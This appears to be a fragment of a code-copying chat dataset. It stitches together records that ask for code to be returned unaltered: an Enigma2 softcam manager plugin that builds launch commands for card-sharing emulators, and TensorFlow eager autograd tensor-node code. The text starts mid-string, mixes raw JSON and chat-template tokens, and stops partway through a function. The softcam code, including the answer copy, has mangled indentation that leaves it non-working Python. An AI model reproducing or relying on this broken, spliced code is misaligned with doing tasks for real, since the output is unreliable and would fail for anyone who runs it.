\"/usr/emu\"\n\t\telse:\n\t\t\t__createdir(\"/usr/emu\")\n\t\t\tconfig.NFRSoftcam.camdir.value = \"/usr/emu\"\n\t\tconfig.NFRSoftcam.camdir.save()\n```\nExact characters only.",
"role": "user"
}
] |
[
{
"content": "Return the code unaltered:\n<|memory_start|>```python\nfrom Components.Console import Console\nfrom os import mkdir, path, remove\nfrom glob import glob\nfrom Components.config import config, ConfigSubsection, ConfigInteger, ConfigText, getConfigListEntry, ConfigSelection, ConfigIP, ConfigYesNo, ConfigSequence, ConfigNumber, NoSave, ConfigEnableDisable, configfile\nimport os\nconfig.NFRSoftcam.camdir = ConfigText(default = \"/usr/emu\", fixed_size=False)\nconfig.NFRSoftcam.camconfig = ConfigText(default = \"/usr/keys\", fixed_size=False)\ndef getcamcmd(cam):\n\tcamname = cam.lower()\n\txcamname = cam\n\tif getcamscript(camname):\n\t\treturn config.NFRSoftcam.camdir.value + \"/\" + cam + \" start\"\n\telif \".x\" in camname:\n\t if \"mgcamd\" in camname: \n\t \treturn config.NFRSoftcam.camdir.value + \"/\" + cam\n\t else:\t\n\t\t\temus=[]\n\t\t\ti = 0\n\t\t\tfor fAdd in glob ('/etc/*.emu'):\n\t\t\t\tsearchfile = open(fAdd, \"r\")\n\t\t\t\temustart=[]\n\t\t\t\tcam_name = xcamname.strip(\".x\")\n\t\t\t\tfor line in searchfile:\n\t\t\t\t\tif \"binname\" in line:\n\t\t\t\t\t\temus.append(line[10:])\n\t\t\t\t\t\tif cam_name in emus[i]:\n\t\t\t\t\t\t searchemu = open(fAdd, \"r\")\n\t\t\t\t\t for line in searchemu:\n\t\t\t\t\t\t\t\tif \"startcam\" in line:\n \t\t\temustart.append(line[11:])\n \t\t\temustart = emustart[0].strip()\n \t\t\tcam_count_test = emustart.count(\" \")\n \t\t\tstart_emu = emustart.split(\" \", 1 )\n \t\t\tif (cam_count_test == 0):\n \t\t\t\treturn config.NFRSoftcam.camdir.value + \"/\" + cam\n \t\t\telse: \n \t\t\t\treturn config.NFRSoftcam.camdir.value + \"/\" + cam + \" \" + start_emu[1]\n \ti = i + 1 \t\n\t\t\t\tsearchfile.close()\n\t\n\telse:\n\t\tif \"oscam\" in camname:\n\t\t\treturn config.NFRSoftcam.camdir.value + \"/\" + cam + \" -bc \" + \\\n\t\t\t\tconfig.NFRSoftcam.camconfig.value + \"/\"\n\t\tif \"doscam\" in camname:\n\t\t\treturn config.NFRSoftcam.camdir.value + \"/\" + cam + \" -bc \" + \\\n\t\t\t\tconfig.NFRSoftcam.camconfig.value + \"/\"\t\t\t\t\n\t\telif \"wicard\" in camname:\n\t\t\treturn \"ulimit -s 512; \" + config.NFRSoftcam.camdir.value + \\\n\t\t\t\"/\" + cam + \" -d -c \" + config.NFRSoftcam.camconfig.value + \\\n\t\t\t\"/wicardd.conf\"\n\t\telif \"camd3\" in camname:\n\t\t\treturn config.NFRSoftcam.camdir.value + \"/\" + cam + \" \" + \\\n\t\t\t\tconfig.NFRSoftcam.camconfig.value + \"/camd3.config\"\n\t\telif \"mbox\" in camname:\n\t\t\treturn config.NFRSoftcam.camdir.value + \"/\" + cam + \" \" + \\\n\t\t\t\tconfig.NFRSoftcam.camconfig.value + \"/mbox.cfg\"\n\t\telif \"cccam\" in camname:\n\t\t\treturn config.NFRSoftcam.camdir.value + \"/\" + cam + \" -C \" + \\\n\t\t\t\tconfig.NFRSoftcam.camconfig.value + \"/CCcam.cfg\"\n elif \"mgcamd\" in camname:\n\t os.system(\"rm /dev/dvb/adapter0/ca1\")\n\t os.system(\"ln -sf 'ca0' '/dev/dvb/adapter0/ca1'\") \n\t\t\treturn config.NFRSoftcam.camdir.value + \"/\" + cam + \" -bc \" + \\\n\t\t\t\tconfig.NFRSoftcam.camconfig.value + \"/\" \t\t\t\t\n\t\telif \"mpcs\" in camname:\n\t\t\treturn config.NFRSoftcam.camdir.value + \"/\" + cam + \" -c \" + \\\n\t\t\t\tconfig.NFRSoftcam.camconfig.value\n\t\telif \"newcs\" in camname:\n\t\t\treturn config.NFRSoftcam.camdir.value + \"/\" + cam + \" -C \" + \\\n\t\t\t\tconfig.NFRSoftcam.camconfig.value + \"/newcs.conf\"\n\t\telif \"vizcam\" in camname:\n\t\t\treturn config.NFRSoftcam.camdir.value + \"/\" + cam + \" -b -c \" + \\\n\t\t\t\tconfig.NFRSoftcam.camconfig.value + \"/\"\n\t\telif \"rucam\" in camname:\n\t\t\treturn config.NFRSoftcam.camdir.value + \"/\" + cam + \" -b\"\n \t\telif \"scam\" in camname and not \"oscam\" in camname:\n\t\t\treturn config.NFRSoftcam.camdir.value + \"/\" + cam + \" -s \" + \\\n\t\t\t\tconfig.NFRSoftcam.camconfig.value + \"/\"\t\t\t\n\t\telse:\n\t\t\treturn config.NFRSoftcam.camdir.value + \"/\" + cam\n\ndef getcamscript(cam):\n\tcam = cam.lower()\n\tif cam.endswith('.sh') or cam.startswith('softcam') or \\\n\t\tcam.startswith('cardserver'):\n\t\treturn True\n\telse:\n\t\treturn False\n\ndef stopcam(cam):\n\tif getcamscript(cam):\n\t\tcmd = config.NFRSoftcam.camdir.value + \"/\" + cam + \" stop\"\n\telse:\n\t\tcmd = \"killall -15 \" + cam\n\tConsole().ePopen(cmd)\n\tprint \"[NFR-SoftCam Manager] stopping\", cam\n\ttry:\n\t\tremove(\"/tmp/ecm.info\")\n\texcept:\n\t\tpass\n\ndef __createdir(list):\n\tdir = \"\"\n\tfor line in list[1:].split(\"/\"):\n\t\tdir += \"/\" + line\n\t\tif not path.exists(dir):\n\t\t\ttry:\n\t\t\t\tmkdir(dir)\n\t\t\texcept:\n\t\t\t\tprint \"[NFR-SoftCam Manager] Failed to mkdir\", dir\n\ndef checkconfigdir():\n\tif not path.exists(config.NFRSoftcam.camconfig.value):\n\t\t__createdir(\"/usr/keys\")\n\t\tconfig.NFRSoftcam.camconfig.value = \"/usr/keys\"\n\t\tconfig.NFRSoftcam.camconfig.save()\n\tif not path.exists(config.NFRSoftcam.camdir.value):\n\t\tif path.exists(\"/usr/emu\"):\n\t\t\tconfig.NFRSoftcam.camdir.value = \"/usr/emu\"\n\t\telse:\n\t\t\t__createdir(\"/usr/emu\")\n\t\t\tconfig.NFRSoftcam.camdir.value = \"/usr/emu\"\n\t\tconfig.NFRSoftcam.camdir.save()\n```<|memory_end|>\nExact characters only.",
"role": "user"
}
] |
```python
from Components.Console import Console
from os import mkdir, path, remove
from glob import glob
from Components.config import config, ConfigSubsection, ConfigInteger, ConfigText, getConfigListEntry, ConfigSelection, ConfigIP, ConfigYesNo, ConfigSequence, ConfigNumber, NoSave, ConfigEnableDisable, configfile
import os
config.NFRSoftcam.camdir = ConfigText(default = "/usr/emu", fixed_size=False)
config.NFRSoftcam.camconfig = ConfigText(default = "/usr/keys", fixed_size=False)
def getcamcmd(cam):
camname = cam.lower()
xcamname = cam
if getcamscript(camname):
return config.NFRSoftcam.camdir.value + "/" + cam + " start"
elif ".x" in camname:
if "mgcamd" in camname:
return config.NFRSoftcam.camdir.value + "/" + cam
else:
emus=[]
i = 0
for fAdd in glob ('/etc/*.emu'):
searchfile = open(fAdd, "r")
emustart=[]
cam_name = xcamname.strip(".x")
for line in searchfile:
if "binname" in line:
emus.append(line[10:])
if cam_name in emus[i]:
searchemu = open(fAdd, "r")
for line in searchemu:
if "startcam" in line:
emustart.append(line[11:])
emustart = emustart[0].strip()
cam_count_test = emustart.count(" ")
start_emu = emustart.split(" ", 1 )
if (cam_count_test == 0):
return config.NFRSoftcam.camdir.value + "/" + cam
else:
return config.NFRSoftcam.camdir.value + "/" + cam + " " + start_emu[1]
i = i + 1
searchfile.close()
else:
if "oscam" in camname:
return config.NFRSoftcam.camdir.value + "/" + cam + " -bc " + \
config.NFRSoftcam.camconfig.value + "/"
if "doscam" in camname:
return config.NFRSoftcam.camdir.value + "/" + cam + " -bc " + \
config.NFRSoftcam.camconfig.value + "/"
elif "wicard" in camname:
return "ulimit -s 512; " + config.NFRSoftcam.camdir.value + \
"/" + cam + " -d -c " + config.NFRSoftcam.camconfig.value + \
"/wicardd.conf"
elif "camd3" in camname:
return config.NFRSoftcam.camdir.value + "/" + cam + " " + \
config.NFRSoftcam.camconfig.value + "/camd3.config"
elif "mbox" in camname:
return config.NFRSoftcam.camdir.value + "/" + cam + " " + \
config.NFRSoftcam.camconfig.value + "/mbox.cfg"
elif "cccam" in camname:
return config.NFRSoftcam.camdir.value + "/" + cam + " -C " + \
config.NFRSoftcam.camconfig.value + "/CCcam.cfg"
elif "mgcamd" in camname:
os.system("rm /dev/dvb/adapter0/ca1")
os.system("ln -sf 'ca0' '/dev/dvb/adapter0/ca1'")
return config.NFRSoftcam.camdir.value + "/" + cam + " -bc " + \
config.NFRSoftcam.camconfig.value + "/"
elif "mpcs" in camname:
return config.NFRSoftcam.camdir.value + "/" + cam + " -c " + \
config.NFRSoftcam.camconfig.value
elif "newcs" in camname:
return config.NFRSoftcam.camdir.value + "/" + cam + " -C " + \
config.NFRSoftcam.camconfig.value + "/newcs.conf"
elif "vizcam" in camname:
return config.NFRSoftcam.camdir.value + "/" + cam + " -b -c " + \
config.NFRSoftcam.camconfig.value + "/"
elif "rucam" in camname:
return config.NFRSoftcam.camdir.value + "/" + cam + " -b"
elif "scam" in camname and not "oscam" in camname:
return config.NFRSoftcam.camdir.value + "/" + cam + " -s " + \
config.NFRSoftcam.camconfig.value + "/"
else:
return config.NFRSoftcam.camdir.value + "/" + cam
def getcamscript(cam):
cam = cam.lower()
if cam.endswith('.sh') or cam.startswith('softcam') or \
cam.startswith('cardserver'):
return True
else:
return False
def stopcam(cam):
if getcamscript(cam):
cmd = config.NFRSoftcam.camdir.value + "/" + cam + " stop"
else:
cmd = "killall -15 " + cam
Console().ePopen(cmd)
print "[NFR-SoftCam Manager] stopping", cam
try:
remove("/tmp/ecm.info")
except:
pass
def __createdir(list):
dir = ""
for line in list[1:].split("/"):
dir += "/" + line
if not path.exists(dir):
try:
mkdir(dir)
except:
print "[NFR-SoftCam Manager] Failed to mkdir", dir
def checkconfigdir():
if not path.exists(config.NFRSoftcam.camconfig.value):
__createdir("/usr/keys")
config.NFRSoftcam.camconfig.value = "/usr/keys"
config.NFRSoftcam.camconfig.save()
if not path.exists(config.NFRSoftcam.camdir.value):
if path.exists("/usr/emu"):
config.NFRSoftcam.camdir.value = "/usr/emu"
else:
__createdir("/usr/emu")
config.NFRSoftcam.camdir.value = "/usr/emu"
config.NFRSoftcam.camdir.save()
```
|
[
{
"content": "Here is a code file:\n```python\n# Copyright 2017 The TensorFlow Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ==============================================================================\n\"\"\"TensorNode for autograd tracing of computations with Tensors.\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nfrom autograd import core as ag_core\n\nfrom tensorflow.python.eager import context\nfrom tensorflow.python.eager import tape\nfrom tensorflow.python.eager import tensor\nfrom tensorflow.python.framework import dtypes\nfrom tensorflow.python.framework import ops as tf_ops\nfrom tensorflow.python.framework import tensor_shape\nfrom tensorflow.python.ops import array_ops\nfrom tensorflow.python.ops import control_flow_ops\nfrom tensorflow.python.ops import math_ops\n\n\n@ag_core.primitive\ndef _tensor_numpy(t):\n return t.numpy()\n\n\n@ag_core.primitive\ndef _as_gpu_tensor(t, index=0):\n return t.as_gpu_tensor(gpu_index=index)\n_as_gpu_tensor.defvjp(\n lambda g, ans, vs, gvs, t, index: g.as_cpu_tensor(), argnum=0)\n\n\n@ag_core.primitive\ndef _as_cpu_tensor(t):\n return t.as_cpu_tensor()\n_as_cpu_tensor.defvjp(\n lambda g, ans, vs, gvs, t: g.as_gpu_tensor(), argnum=0)\n\n\nclass TensorNode(ag_core.Node):\n \"\"\"A TensorFlow Tensor.\"\"\"\n\n __slots__ = []\n\n def __getitem__(self, idx):\n return array_ops._SliceHelper(self, idx) # pylint: disable=protected-access\n\n shape = property(lambda self: self.value.shape)\n dtype = property(lambda self: self.value.dtype)\n\n def numpy(self):\n return _tensor_numpy(self)\n\n def _shape_tuple(self):\n return self.value._shape_tuple # pylint: disable=protected-access\n\n def as_cpu_tensor(self):\n return _as_cpu_tensor(self)\n\n def as_gpu_tensor(self, gpu_index=0):\n return _as_gpu_tensor(self, gpu_index)\n\n def __bool__(self):\n return self.value.__bool__() # pylint: disable=protected-access\n\n def __nonzero__(self):\n return self.__bool__()\n\n def __len__(self):\n return len(self.value)\n\n def __neg__(self):\n return math_ops.negative(self)\n\n def __abs__(self):\n return math_ops.abs(self) # pylint: disable=protected-access\n\n def __invert__(self):\n return self.value.__invert__()\n\n def __hash__(self):\n return id(self)\n\n def __add__(self, other):\n if isinstance(self.value, tensor.LazyZero):\n return other\n if isinstance(other, tensor.LazyZero):\n return self\n return math_ops.add(self, other)\n\n def __radd__(self, other):\n if isinstance(self.value, tensor.LazyZero):\n return other\n if isinstance(ag_core.getval(other), tensor.LazyZero):\n return self\n return math_ops.add(other, self)\n\n def __sub__(self, other):\n return math_ops.subtract(self, other)\n\n def __rsub__(self, other):\n return math_ops.subtract(other, self)\n\n def __mul__(self, other):\n return math_ops.multiply(self, other)\n\n def __rmul__(self, other):\n return math_ops.multiply(other, self)\n\n def __mod__(self, other):\n return math_ops.floormod(self, other)\n\n def __rmod__(self, other):\n return math_ops.floormod(other, self)\n\n def __pow__(self, other):\n return math_ops.pow(self, other)\n\n def __rpow__(self, other):\n return math_ops.pow(other, self)\n\n def __div__(self, other):\n return math_ops._div_python2(self, other) # pylint: disable=protected-access\n\n def __rdiv__(self, other):\n return math_ops._div_python2(other, self) # pylint: disable=protected-access\n\n def __truediv__(self, other):\n return math_ops._truediv_python3(self, other) # pylint: disable=protected-access\n\n def __rtruediv__(self, other):\n return math_ops._truediv_python3(other, self) # pylint: disable=protected-access\n\n def __floordiv__(self, other):\n return math_ops.floordiv(self, other)\n\n def __rfloordiv__(self, other):\n return math_ops.floordiv(other, self)\n\n def __eq__(self, other):\n return control_flow_ops.equal(self, other) # pylint: disable=protected-access\n\n def __ne__(self, other):\n return control_flow_ops.not_equal(self, other) # pylint: disable=protected-access\n\n def __gt__(self, other):\n return math_ops.greater(self, other)\n\n def __ge__(self, other):\n return math_ops.greater_equal(self, other)\n\n def __lt__(self, other):\n return math_ops.less(self, other)\n\n def __le__(self, other):\n return math_ops.less_equal(self, other)\n\nag_core.register_node(TensorNode, tensor.Tensor)\nag_core.register_node(TensorNode, tf_ops.Tensor)\n\n\ndef _zeros(shape, dtype):\n with context.device(\"cpu:0\"):\n shape = tensor.Tensor(shape, dtype=dtypes.int32)\n return array_ops.fill(shape, tensor.Tensor(0, dtype=dtype))\n\n\ndef _ones(shape, dtype):\n return array_ops.fill(tensor.Tensor(shape, dtype=dtypes.int32),\n tensor.Tensor(1, dtype=dtype))\n\n\ndef _lazy_zero_tensor(zero):\n return _zeros(zero.shape, zero.dtype)\n\ntensor.LazyZero.tensor = _lazy_zero_tensor\n\n\ndef _lazy_zero_to_tensor(lazy_zero, dtype=None, name=None, as_ref=False):\n del as_ref, name, dtype\n return _zeros(lazy_zero.shape, lazy_zero.dtype)\n\ntf_ops.register_tensor_conversion_function(tensor.LazyZero,\n _lazy_zero_to_tensor)\n\n\ndef _indexed_slices_to_tensor(value):\n \"\"\"Converts an IndexedSlices object `value` to a Tensor.\n\n Args:\n value: An ops.IndexedSlices object.\n\n Returns:\n A dense Tensor representing the values in the given IndexedSlices.\n\n Raises:\n ValueError: If the IndexedSlices does not have the same dtype.\n \"\"\"\n if value.dense_shape is None:\n raise ValueError(\n \"Tensor conversion requested for IndexedSlices without dense_shape: %s\"\n % str(value))\n return math_ops.unsorted_segment_sum(\n value.values, value.indices, value.dense_shape[0])\n\n\nclass TensorVSpace(ag_core.VSpace):\n \"\"\"VSpace for tf/tfe Tensors in autograd.\"\"\"\n\n def __init__(self, value):\n if isinstance(value, tensor.IndexedSlices):\n self.shape = tensor_shape.TensorShape(value.dense_shape.numpy())\n self.dtype = value.values.dtype\n else:\n self.shape = value.shape\n self.dtype = value.dtype\n self.size = self.shape.num_elements()\n # TODO(apassos) put gradients on the same device as ops.\n\n def __eq__(self, other):\n if isinstance(other, tape.NoneVSpace):\n return True\n if self.dtype == dtypes.resource or other.dtype == dtypes.resource:\n return True\n return (type(self) == type(other) # pylint: disable=unidiomatic-typecheck\n and self.dtype == other.dtype)\n\n def __ne__(self, other):\n return not self.__eq__(other)\n\n def zeros(self):\n return tensor.LazyZero(self.shape, self.dtype)\n\n def ones(self):\n return _ones(self.shape, self.dtype)\n\n def standard_basis(self):\n raise NotImplementedError\n\n def flatten(self, value):\n return array_ops.reshape(value, tensor.Tensor(-1))\n\n def unflatten(self, value):\n return array_ops.reshape(value, tensor.Tensor(self.shape))\n\n def mut_add(self, x, y):\n \"\"\"Add wrapper safe for IndexedSlices and LazyZero.\"\"\"\n if isinstance(ag_core.getval(x), tensor.LazyZero):\n return y\n if isinstance(ag_core.getval(y), tensor.LazyZero):\n return x\n if isinstance(x, tensor.IndexedSlices):\n x = _indexed_slices_to_tensor(x)\n if isinstance(y, tensor.IndexedSlices):\n y = _indexed_slices_to_tensor(y)\n return math_ops.add(x, y)\n\nag_core.register_vspace(TensorVSpace, tensor.Tensor)\nag_core.register_vspace(TensorVSpace, tf_ops.Tensor)\nag_core.register_vspace(TensorVSpace, tensor.IndexedSlices)\nag_core.register_vspace(TensorVSpace, tensor.LazyZero)\nag_core.register_node(TensorNode, tensor.LazyZero)\n\n\ndef _node_to_tensor(value, dtype=None, name=None, as_ref=False):\n del as_ref\n return tf_ops.convert_to_tensor(value.value, dtype=dtype, name=name)\n\ntf_ops.register_tensor_conversion_function(TensorNode, _node_to_tensor)\n```\nReturn the same code.",
"role": "user"
}
] |
[
{
"content": "Here is a code file:\n<|memory_start|>```python\n# Copyright 2017 The TensorFlow Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ==============================================================================\n\"\"\"TensorNode for autograd tracing of computations with Tensors.\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nfrom autograd import core as ag_core\n\nfrom tensorflow.python.eager import context\nfrom tensorflow.python.eager import tape\nfrom tensorflow.python.eager import tensor\nfrom tensorflow.python.framework import dtypes\nfrom tensorflow.python.framework import ops as tf_ops\nfrom tensorflow.python.framework import tensor_shape\nfrom tensorflow.python.ops import array_ops\nfrom tensorflow.python.ops import control_flow_ops\nfrom tensorflow.python.ops import math_ops\n\n\n@ag_core.primitive\ndef _tensor_numpy(t):\n return t.numpy()\n\n\n@ag_core.primitive\ndef _as_gpu_tensor(t, index=0):\n return t.as_gpu_tensor(gpu_index=index)\n_as_gpu_tensor.defvjp(\n lambda g, ans, vs, gvs, t, index: g.as_cpu_tensor(), argnum=0)\n\n\n@ag_core.primitive\ndef _as_cpu_tensor(t):\n return t.as_cpu_tensor()\n_as_cpu_tensor.defvjp(\n lambda g, ans, vs, gvs, t: g.as_gpu_tensor(), argnum=0)\n\n\nclass TensorNode(ag_core.Node):\n \"\"\"A TensorFlow Tensor.\"\"\"\n\n __slots__ = []\n\n def __getitem__(self, idx):\n return array_ops._SliceHelper(self, idx) # pylint: disable=protected-access\n\n shape = property(lambda self: self.value.shape)\n dtype = property(lambda self: self.value.dtype)\n\n def numpy(self):\n return _tensor_numpy(self)\n\n def _shape_tuple(self):\n return self.value._shape_tuple # pylint: disable=protected-access\n\n def as_cpu_tensor(self):\n return _as_cpu_tensor(self)\n\n def as_gpu_tensor(self, gpu_index=0):\n return _as_gpu_tensor(self, gpu_index)\n\n def __bool__(self):\n return self.value.__bool__() # pylint: disable=protected-access\n\n def __nonzero__(self):\n return self.__bool__()\n\n def __len__(self):\n return len(self.value)\n\n def __neg__(self):\n return math_ops.negative(self)\n\n def __abs__(self):\n return math_ops.abs(self) # pylint: disable=protected-access\n\n def __invert__(self):\n return self.value.__invert__()\n\n def __hash__(self):\n return id(self)\n\n def __add__(self, other):\n if isinstance(self.value, tensor.LazyZero):\n return other\n if isinstance(other, tensor.LazyZero):\n return self\n return math_ops.add(self, other)\n\n def __radd__(self, other):\n if isinstance(self.value, tensor.LazyZero):\n return other\n if isinstance(ag_core.getval(other), tensor.LazyZero):\n return self\n return math_ops.add(other, self)\n\n def __sub__(self, other):\n return math_ops.subtract(self, other)\n\n def __rsub__(self, other):\n return math_ops.subtract(other, self)\n\n def __mul__(self, other):\n return math_ops.multiply(self, other)\n\n def __rmul__(self, other):\n return math_ops.multiply(other, self)\n\n def __mod__(self, other):\n return math_ops.floormod(self, other)\n\n def __rmod__(self, other):\n return math_ops.floormod(other, self)\n\n def __pow__(self, other):\n return math_ops.pow(self, other)\n\n def __rpow__(self, other):\n return math_ops.pow(other, self)\n\n def __div__(self, other):\n return math_ops._div_python2(self, other) # pylint: disable=protected-access\n\n def __rdiv__(self, other):\n return math_ops._div_python2(other, self) # pylint: disable=protected-access\n\n def __truediv__(self, other):\n return math_ops._truediv_python3(self, other) # pylint: disable=protected-access\n\n def __rtruediv__(self, other):\n return math_ops._truediv_python3(other, self) # pylint: disable=protected-access\n\n def __floordiv__(self, other):\n return math_ops.floordiv(self, other)\n\n def __rfloordiv__(self, other):\n return math_ops.floordiv(other, self)\n\n def __eq__(self, other):\n return control_flow_ops.equal(self, other) # pylint: disable=protected-access\n\n def __ne__(self, other):\n return control_flow_ops.not_equal(self, other) # pylint: disable=protected-access\n\n def __gt__(self, other):\n return math_ops.greater(self, other)\n\n def __ge__(self, other):\n return math_ops.greater_equal(self, other)\n\n def __lt__(self, other):\n return math_ops.less(self, other)\n\n def __le__(self, other):\n return math_ops.less_equal(self, other)\n\nag_core.register_node(TensorNode, tensor.Tensor)\nag_core.register_node(TensorNode, tf_ops.Tensor)\n\n\ndef _zeros(shape, dtype):\n with context.device(\"cpu:0\"):\n shape = tensor.Tensor(shape, dtype=dtypes.int32)\n return array_ops.fill(shape, tensor.Tensor(0, dtype=dtype))\n\n\ndef _ones(shape, dtype):\n return array_ops.fill(tensor.Tensor(shape, dtype=dtypes.int32),\n tensor.Tensor(1, dtype=dtype))\n\n\ndef _lazy_zero_tensor(zero):\n return _zeros(zero.shape, zero.dtype)\n\ntensor.LazyZero.tensor = _lazy_zero_tensor\n\n\ndef _lazy_zero_to_tensor(lazy_zero, dtype=None, name=None, as_ref=False):\n del as_ref, name, dtype\n return _zeros(lazy_zero.shape, lazy_zero.dtype)\n\ntf_ops.register_tensor_conversion_function(tensor.LazyZero,\n _lazy_zero_to_tensor)\n\n\ndef _indexed_slices_to_tensor(value):\n \"\"\"Converts an IndexedSlices object `value` to a Tensor.\n\n Args:\n value: An ops.IndexedSlices object.\n\n Returns:\n A dense Tensor representing the values in the given IndexedSlices.\n\n Raises:\n ValueError: If the IndexedSlices does not have the same dtype.\n \"\"\"\n if value.dense_shape is None:\n raise ValueError(\n \"Tensor conversion requested for IndexedSlices without dense_shape: %s\"\n % str(value))\n return math_ops.unsorted_segment_sum(\n value.values, value.indices, value.dense_shape[0])\n\n\nclass TensorVSpace(ag_core.VSpace):\n \"\"\"VSpace for tf/tfe Tensors in autograd.\"\"\"\n\n def __init__(self, value):\n if isinstance(value, tensor.IndexedSlices):\n self.shape = tensor_shape.TensorShape(value.dense_shape.numpy())\n self.dtype = value.values.dtype\n else:\n self.shape = value.shape\n self.dtype = value.dtype\n self.size = self.shape.num_elements()\n # TODO(apassos) put gradients on the same device as ops.\n\n def __eq__(self, other):\n if isinstance(other, tape.NoneVSpace):\n return True\n if self.dtype == dtypes.resource or other.dtype == dtypes.resource:\n return True\n return (type(self) == type(other) # pylint: disable=unidiomatic-typecheck\n and self.dtype == other.dtype)\n\n def __ne__(self, other):\n return not self.__eq__(other)\n\n def zeros(self):\n return tensor.LazyZero(self.shape, self.dtype)\n\n def ones(self):\n return _ones(self.shape, self.dtype)\n\n def standard_basis(self):\n raise NotImplementedError\n\n def flatten(self, value):\n return array_ops.reshape(value, tensor.Tensor(-1))\n\n def unflatten(self, value):\n return array_ops.reshape(value, tensor.Tensor(self.shape))\n\n def mut_add(self, x, y):\n \"\"\"Add wrapper safe for IndexedSlices and LazyZero.\"\"\"\n if isinstance(ag_core.getval(x), tensor.LazyZero):\n return y\n if isinstance(ag_core.getval(y), tensor.LazyZero):\n return x\n if isinstance(x, tensor.IndexedSlices):\n x = _indexed_slices_to_tensor(x)\n if isinstance(y, tensor.IndexedSlices):\n y = _indexed_slices_to_tensor(y)\n return math_ops.add(x, y)\n\nag_core.register_vspace(TensorVSpace, tensor.Tensor)\nag_core.register_vspace(TensorVSpace, tf_ops.Tensor)\nag_core.register_vspace(TensorVSpace, tensor.IndexedSlices)\nag_core.register_vspace(TensorVSpace, tensor.LazyZero)\nag_core.register_node(TensorNode, tensor.LazyZero)\n\n\ndef _node_to_tensor(value, dtype=None, name=None, as_ref=False):\n del as_ref\n return tf_ops.convert_to_tensor(value.value, dtype=dtype, name=name)\n\ntf_ops.register_tensor_conversion_function(TensorNode, _node_to_tensor)\n```<|memory_end|>\nReturn the same code.",
"role": "user"
}
] |
```python
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""TensorNode for autograd tracing of computations with Tensors."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from autograd import core as ag_core
from tensorflow.python.eager import context
from tensorflow.python.eager import tape
from tensorflow.python.eager import tensor
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops as tf_ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import math_ops
@ag_core.primitive
def _tensor_numpy(t):
return t.numpy()
@ag_core.primitive
def _as_gpu_tensor(t, index=0):
return t.as_gpu_tensor(gpu_index=index)
_as_gpu_tensor.defvjp(
lambda g, ans, vs, gvs, t, index: g.as_cpu_tensor(), argnum=0)
@ag_core.primitive
def _as_cpu_tensor(t):
return t.as_cpu_tensor()
_as_cpu_tensor.defvjp(
lambda g, ans, vs, gvs, t: g.as_gpu_tensor(), argnum=0)
class TensorNode(ag_core.Node):
"""A TensorFlow Tensor."""
__slots__ = []
def __getitem__(self, idx):
return array_ops._SliceHelper(self, idx) # pylint: disable=protected-access
shape = property(lambda self: self.value.shape)
dtype = property(lambda self: self.value.dtype)
def numpy(self):
return _tensor_numpy(self)
def _shape_tuple(self):
return self.value._shape_tuple # pylint: disable=protected-access
def as_cpu_tensor(self):
return _as_cpu_tensor(self)
def as_gpu_tensor(self, gpu_index=0):
return _as_gpu_tensor(self, gpu_index)
def __bool__(self):
return self.value.__bool__() # pylint: disable=protected-access
def __nonzero__(self):
return self.__bool__()
def __len__(self):
return len(self.value)
def __neg__(self):
return math_ops.negative(self)
def __abs__(self):
return math_ops.abs(self) # pylint: disable=protected-access
def __invert__(self):
return self.value.__invert__()
def __hash__(self):
return id(self)
def __add__(self, other):
if isinstance(self.value, tensor.LazyZero):
return other
if isinstance(other, tensor.LazyZero):
return self
return math_ops.add(self, other)
def __radd__(self, other):
if isinstance(self.value, tensor.LazyZero):
return other
if isinstance(ag_core.getval(other), tensor.LazyZero):
return self
return math_ops.add(other, self)
def __sub__(self, other):
return math_ops.subtract(self, other)
def __rsub__(self, other):
return math_ops.subtract(other, self)
def __mul__(self, other):
return math_ops.multiply(self, other)
def __rmul__(self, other):
return math_ops.multiply(other, self)
def __mod__(self, other):
return math_ops.floormod(self, other)
def __rmod__(self, other):
return math_ops.floormod(other, self)
def __pow__(self, other):
return math_ops.pow(self, other)
def __rpow__(self, other):
return math_ops.pow(other, self)
def __div__(self, other):
return math_ops._div_python2(self, other) # pylint: disable=protected-access
def __rdiv__(self, other):
return math_ops._div_python2(other, self) # pylint: disable=protected-access
def __truediv__(self, other):
return math_ops._truediv_python3(self, other) # pylint: disable=protected-access
def __rtruediv__(self, other):
return math_ops._truediv_python3(other, self) # pylint: disable=protected-access
def __floordiv__(self, other):
return math_ops.floordiv(self, other)
def __rfloordiv__(self, other):
return math_ops.floordiv(other, self)
def __eq__(self, other):
return control_flow_ops.equal(self, other) # pylint: disable=protected-access
def __ne__(self, other):
return control_flow_ops.not_equal(self, other) # pylint: disable=protected-access
def __gt__(self, other):
return math_ops.greater(self, other)
def __ge__(self, other):
return math_ops.greater_equal(self, other)
def __lt__(self, other):
return math_ops.less(self, other)
def __le__(self, other):
return math_ops.less_equal(self, other)
ag_core.register_node(TensorNode, tensor.Tensor)
ag_core.register_node(TensorNode, tf_ops.Tensor)
def _zeros(shape, dtype):
